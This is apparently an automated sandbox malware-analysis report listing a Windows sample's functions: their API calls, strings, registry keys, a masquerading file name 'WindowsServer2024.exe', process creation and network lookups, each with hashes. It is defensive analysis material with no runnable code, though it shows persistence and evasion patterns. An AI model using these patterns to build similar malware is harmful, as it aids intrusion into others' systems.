                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLocal$AllocTask__snwprintf$FolderKnownPathlstrlen
                                                                            • String ID: %s\System32$\\?\%s
                                                                            • API String ID: 2558432158-2868705786
                                                                            • Opcode ID: ed283b278728a41b0e841a9f01d448b2b987ae2f680898eb7bf5a09e224fe0d1
                                                                            • Instruction ID: 1215fe4b4e667ee02dba20211420bbfe23ed01d80f908085de419ec5f930f144
                                                                            • Opcode Fuzzy Hash: ed283b278728a41b0e841a9f01d448b2b987ae2f680898eb7bf5a09e224fe0d1
                                                                            • Instruction Fuzzy Hash: 7021EDB5E40208FBDB14DBE4DC49BAEBB75BF48700F108999F611A7290DB785A40DB51
                                                                            Function 007DB9A0 Relevance: 21.1, APIs: 14, Instructions: 111memorynetworkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,-00000001,?,007DB8E1,00000000,00000000,0083D2C8,0083D370), ref: 007DB9AF
                                                                            • _memmove.LIBCMT ref: 007DB9CE
                                                                            • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,007DB8E1,00000000,00000000), ref: 007DB9F4
                                                                            • inet_addr.WS2_32(00000000), ref: 007DBA14
                                                                            • gethostbyname.WS2_32(00000000), ref: 007DBA27
                                                                            • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,007DB8E1,00000000), ref: 007DBA3A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$Alloc_memmovegethostbynameinet_addr
                                                                            • String ID:
                                                                            • API String ID: 3088692038-0
                                                                            • Opcode ID: ca964205d48fa5b71a79b587e3b11c6b486d00efeb45176fe84fa685204d1f25
                                                                            • Instruction ID: 12f2948c231b627998274f59959ef4cfaad1cbc370cb0432f9d6d401b418928c
                                                                            • Opcode Fuzzy Hash: ca964205d48fa5b71a79b587e3b11c6b486d00efeb45176fe84fa685204d1f25
                                                                            • Instruction Fuzzy Hash: 44410AB5A00208EFCB04DFA4D888BAEB7B5FF8C304F108559F906A7391D7799A41DB54
                                                                            Function 007D2E00 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 82memorystringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SHGetKnownFolderPath.SHELL32(007F7C00,00000000,00000000,007D5BB2,?,?,?,?,?,?,?,?,?,?,?,007D5BB2), ref: 007D2E13
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,?,?,?,?,?,?,?,?,?,007D5BB2), ref: 007D2E28
                                                                            • __snwprintf.LIBCMT ref: 007D2E61
                                                                            • lstrlenW.KERNEL32(00000000), ref: 007D2E6D
                                                                            • _memset.LIBCMT ref: 007D2E97
                                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 007D2EC0
                                                                            • SHFileOperationW.SHELL32(?), ref: 007D2ED7
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D2EFD
                                                                            • CoTaskMemFree.COMBASE(007D5BB2), ref: 007D2F07
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileFreeLocal$AllocAttributesFolderKnownOperationPathTask__snwprintf_memsetlstrlen
                                                                            • String ID: %s\%s${206629A6-BF8E-426E-AEC4-88B3A8712196}
                                                                            • API String ID: 561441633-3959428754
                                                                            • Opcode ID: 51adc60179a79d27074bf7278b7ada5f38684ad4a588c041b658c78b86c32419
                                                                            • Instruction ID: 7838af07df9b2fc3e1d422da0a342493bf1d8ff0ccd55978dce351249d822295
                                                                            • Opcode Fuzzy Hash: 51adc60179a79d27074bf7278b7ada5f38684ad4a588c041b658c78b86c32419
                                                                            • Instruction Fuzzy Hash: 10318D75E00208EBDB04DBA4DC49BBEBB75FF98700F108969F501A7391E7789A42CB50
                                                                            Function 007D6BE0 Relevance: 21.1, APIs: 14, Instructions: 80synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetEvent.KERNEL32(00000000,?,007DBE80), ref: 007D6BFC
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,007DBE80), ref: 007D6C14
                                                                            • CloseHandle.KERNEL32(00000000,?,007DBE80), ref: 007D6C2A
                                                                            • SetEvent.KERNEL32(00000000,?,007DBE80), ref: 007D6C3F
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,007DBE80), ref: 007D6C57
                                                                            • CloseHandle.KERNEL32(00000000,?,007DBE80), ref: 007D6C6D
                                                                            • CloseHandle.KERNEL32(00000000,?,007DBE80), ref: 007D6C82
                                                                            • SetEvent.KERNEL32(00000000,?,007DBE80), ref: 007D6C98
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,007DBE80), ref: 007D6CB0
                                                                            • CloseHandle.KERNEL32(00000000,?,007DBE80), ref: 007D6CC5
                                                                            • SetEvent.KERNEL32(00000000,?,007DBE80), ref: 007D6CDB
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,007DBE80), ref: 007D6CF3
                                                                            • CloseHandle.KERNEL32(00000000,?,007DBE80), ref: 007D6D08
                                                                            • CloseHandle.KERNEL32(00000000,?,007DBE80), ref: 007D6D1E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$EventObjectSingleWait
                                                                            • String ID:
                                                                            • API String ID: 2857295742-0
                                                                            • Opcode ID: 495fc0ee682a947243fbe8c43b1e7c0822e56ff710e7cd74a255639ecb3c2518
                                                                            • Instruction ID: bdcd930325dc95647436890ef668aa7bf6f1fa34dbec29c8520f5938c8a36038
                                                                            • Opcode Fuzzy Hash: 495fc0ee682a947243fbe8c43b1e7c0822e56ff710e7cd74a255639ecb3c2518
                                                                            • Instruction Fuzzy Hash: 0831D572114200DBD3289B68FC8DB613776F394316F508A19E16A623F1DB7CA885CF18
                                                                            Function 007CB5A0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 80fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 007CB5C0
                                                                            • _memset.LIBCMT ref: 007CB5DF
                                                                              • Part of subcall function 007CFE20: SHGetKnownFolderPath.SHELL32(?,00000000,00000000,?), ref: 007CFE74
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(?), ref: 007CFE86
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(00831110), ref: 007CFE99
                                                                              • Part of subcall function 007CFE20: LocalAlloc.KERNEL32(00000040,?), ref: 007CFEB2
                                                                              • Part of subcall function 007CFE20: __snwprintf.LIBCMT ref: 007CFEDA
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(00000000), ref: 007CFEE6
                                                                              • Part of subcall function 007CFE20: CoTaskMemFree.COMBASE(?), ref: 007CFEF5
                                                                            • __snwprintf.LIBCMT ref: 007CB626
                                                                            • __snwprintf.LIBCMT ref: 007CB64B
                                                                            • DeleteFileW.KERNEL32(?), ref: 007CB65A
                                                                            • RemoveDirectoryW.KERNEL32(00000000), ref: 007CB66C
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CB67E
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CB692
                                                                            • GetFileAttributesW.KERNEL32(?), ref: 007CB69F
                                                                            • GetFileAttributesW.KERNEL32(?), ref: 007CB6B5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileFreeLocal__snwprintflstrlen$Attributes_memset$AllocDeleteDirectoryFolderKnownPathRemoveTask
                                                                            • String ID: %s%s$WindowsServer2024.exe
                                                                            • API String ID: 4117469550-1924646418
                                                                            • Opcode ID: 43549866434d0b96479128969541b14f1797629f1b8e2020d28f3413134b6c32
                                                                            • Instruction ID: 2d0cbc8a0a96eab06b7de5dbd38e9b22fca395ce97615c098a1c862ca97851f6
                                                                            • Opcode Fuzzy Hash: 43549866434d0b96479128969541b14f1797629f1b8e2020d28f3413134b6c32
                                                                            • Instruction Fuzzy Hash: 342167B19402189BCB50D774DC8EFE97735AB54700F500ADCF619E62D1EB799EC48BA0
                                                                            Function 007C9FC0 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 74registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 007C9FF4
                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 007CA00A
                                                                              • Part of subcall function 007DC570: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,?,007D430B,?,00000000), ref: 007DC58C
                                                                              • Part of subcall function 007DC570: GetFileSize.KERNEL32(000000FF,00000000,?,007D430B,?), ref: 007DC5A1
                                                                              • Part of subcall function 007DC570: LocalAlloc.KERNELBASE(00000040,000000FF,?,007D430B), ref: 007DC5B6
                                                                              • Part of subcall function 007DC570: ReadFile.KERNELBASE(000000FF,00000000,000000FF,?,00000000), ref: 007DC5D7
                                                                              • Part of subcall function 007DC570: CloseHandle.KERNELBASE(000000FF), ref: 007DC5ED
                                                                            • __snwprintf.LIBCMT ref: 007CA057
                                                                            • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 007CA072
                                                                            • RegSetValueExW.ADVAPI32(?,{CE0CD485-D472-437F-80D7-DAF95EA046F4},00000000,00000003,00000000,00000000), ref: 007CA09A
                                                                            • RegCloseKey.ADVAPI32(?), ref: 007CA0AB
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CA0B8
                                                                            • RegCloseKey.ADVAPI32(?), ref: 007CA0CC
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CA0D9
                                                                            Strings
                                                                            • {DE7C4D5F-E773-43F0-B029-ED407FF538E8}, xrefs: 007CA041
                                                                            • {CE0CD485-D472-437F-80D7-DAF95EA046F4}, xrefs: 007CA08E
                                                                            • SOFTWARE\%s, xrefs: 007CA046
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$CloseLocal$Free$AllocCreateHandleModuleNameOpenReadSizeValue__snwprintf_memset
                                                                            • String ID: SOFTWARE\%s${CE0CD485-D472-437F-80D7-DAF95EA046F4}${DE7C4D5F-E773-43F0-B029-ED407FF538E8}
                                                                            • API String ID: 3609211549-896602482
                                                                            • Opcode ID: ff57703f8d6b642697b50eefb4e2f254c7454214e50083a70acef78b822ccc0e
                                                                            • Instruction ID: 75bdc3cf5c3e4fc4b9cac35b64260db820fe165bb190f6fe6a4d72fa9d23ecd5
                                                                            • Opcode Fuzzy Hash: ff57703f8d6b642697b50eefb4e2f254c7454214e50083a70acef78b822ccc0e
                                                                            • Instruction Fuzzy Hash: 9D2182B5A40318ABD720DB60DC4DFEA7778BB54704F0049D8B619A6181EBB89A848FA1
                                                                            Function 007CA550 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 86memoryprocessCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CA560
                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00007FFF), ref: 007CA57C
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CA591
                                                                              • Part of subcall function 007D79F0: lstrlenW.KERNEL32(?,?,?,?,?,?,?,007D68E6,007F47E8), ref: 007D7A19
                                                                            • __snwprintf.LIBCMT ref: 007CA5DD
                                                                            • _memset.LIBCMT ref: 007CA5F0
                                                                            • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 007CA637
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CA646
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CA650
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CA661
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CA66B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$Alloc$CreateDirectoryProcessSystem__snwprintf_memsetlstrlen
                                                                            • String ID: D
                                                                            • API String ID: 2329958830-2746444292
                                                                            • Opcode ID: 8d7d0e840a0fb39ffe16e139e5212723000ca31be9697b152a403b93f315e8eb
                                                                            • Instruction ID: ebe33ecfaf1f4a9c17bd854aa056ab0ae771e7ac14f0e28d1e58b4a367341b24
                                                                            • Opcode Fuzzy Hash: 8d7d0e840a0fb39ffe16e139e5212723000ca31be9697b152a403b93f315e8eb
                                                                            • Instruction Fuzzy Hash: B63141B5A40208FBDB10DBA4DC8DFED7B78BF88701F1045A8F605BB290DA755A84CB50
                                                                            Function 007C9670 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 86registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 007C81C0: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,007C8D2B,007D6B10,00000000), ref: 007C81EB
                                                                              • Part of subcall function 007C81C0: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,007C8D2B), ref: 007C8205
                                                                              • Part of subcall function 007C81C0: wnsprintfW.SHLWAPI ref: 007C8235
                                                                              • Part of subcall function 007C81C0: wnsprintfW.SHLWAPI ref: 007C8251
                                                                              • Part of subcall function 007C81C0: LocalFree.KERNEL32(00000000), ref: 007C8A43
                                                                              • Part of subcall function 007C1C60: _wcsrchr.LIBCMT ref: 007C1C6C
                                                                            • _memset.LIBCMT ref: 007C96E5
                                                                            • __snwprintf.LIBCMT ref: 007C9703
                                                                            • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F013F,?), ref: 007C9722
                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000003,00000000,00000000), ref: 007C974B
                                                                            • RegCloseKey.ADVAPI32(?), ref: 007C9759
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C9763
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C976D
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C977E
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C9788
                                                                            Strings
                                                                            • {70F925A9-13A6-49C0-913B-C685A8E9B495}, xrefs: 007C96ED
                                                                            • SOFTWARE\%s, xrefs: 007C96F2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$Allocwnsprintf$CloseOpenQueryValue__snwprintf_memset_wcsrchr
                                                                            • String ID: SOFTWARE\%s${70F925A9-13A6-49C0-913B-C685A8E9B495}
                                                                            • API String ID: 1140279918-90677415
                                                                            • Opcode ID: a009ef9740a6b3bd251f332d6f5eb0291f68658d26e814faae17ceb206892ca8
                                                                            • Instruction ID: 34a4ac7aae2ae598b6101eb0f6a2f823bb8283edfe5b29e3363ee3e094de6538
                                                                            • Opcode Fuzzy Hash: a009ef9740a6b3bd251f332d6f5eb0291f68658d26e814faae17ceb206892ca8
                                                                            • Instruction Fuzzy Hash: E0311E75A10208ABDB54DBA4DC4DFEE7778EF48700F104998F605E7290EB799A44CB51
                                                                            Function 007E26F0 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 86memorystringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,00000280), ref: 007E2700
                                                                            • lstrcpyW.KERNEL32(0000001C,CPU001), ref: 007E2735
                                                                              • Part of subcall function 007DC3A0: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 007DC3DB
                                                                              • Part of subcall function 007DC3A0: CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 007DC3F4
                                                                              • Part of subcall function 007DC3A0: FreeSid.ADVAPI32(?), ref: 007DC409
                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 007E2754
                                                                            • LocalFree.KERNEL32(00000020), ref: 007E2762
                                                                            • LocalFree.KERNEL32(00000020), ref: 007E2796
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLocal$AllocAllocateCheckFileInitializeMembershipModuleNameTokenlstrcpy
                                                                            • String ID: %s [%d]$CPU001
                                                                            • API String ID: 2255487582-1715046084
                                                                            • Opcode ID: a764ed32673b94ce2577a44aefb768cbe91f30b7f8218676a677d27ec2524901
                                                                            • Instruction ID: 6d100cdf96fc84d22e25c17cf99aead13901e2ab8cb0f55fd94550531349d4cb
                                                                            • Opcode Fuzzy Hash: a764ed32673b94ce2577a44aefb768cbe91f30b7f8218676a677d27ec2524901
                                                                            • Instruction Fuzzy Hash: 1D316DB4E01208AFDB10DBA4DC4DBADB7B4EF8C704F1085A8E506A7251DB789A85CF50
                                                                            Function 007E2450 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 75memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CoInitialize.OLE32(00000000), ref: 007E2466
                                                                            • CoCreateGuid.COMBASE(c ~), ref: 007E2478
                                                                            • StringFromGUID2.COMBASE(c ~,?,00000027), ref: 007E2490
                                                                            • wsprintfA.USER32 ref: 007E24AB
                                                                            • LocalAlloc.KERNEL32(00000040,00000068), ref: 007E24B8
                                                                            • und_memcpy.LIBCMTD ref: 007E2505
                                                                            • LocalFree.KERNEL32(00000000), ref: 007E2511
                                                                            • CoUninitialize.COMBASE ref: 007E2517
                                                                            • CoUninitialize.COMBASE ref: 007E2524
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LocalUninitialize$AllocCreateFreeFromGuidInitializeStringund_memcpywsprintf
                                                                            • String ID: c ~$c ~
                                                                            • API String ID: 3539965953-562358039
                                                                            • Opcode ID: aaacc4b15bd60aadd8248ae22f50b90718cee060ce066196359345bcb7fee820
                                                                            • Instruction ID: b572a5f5f82b80faa583ac17d08271c2c0717d8ccf59aa94802a6769adbd8355
                                                                            • Opcode Fuzzy Hash: aaacc4b15bd60aadd8248ae22f50b90718cee060ce066196359345bcb7fee820
                                                                            • Instruction Fuzzy Hash: 5E2186B2A00308EBDB04DBB4ED4AFAE77B9BF58705F044518F609DB281EA35D914CB51
                                                                            Function 007DACE0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72windowregistryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 007DACE8
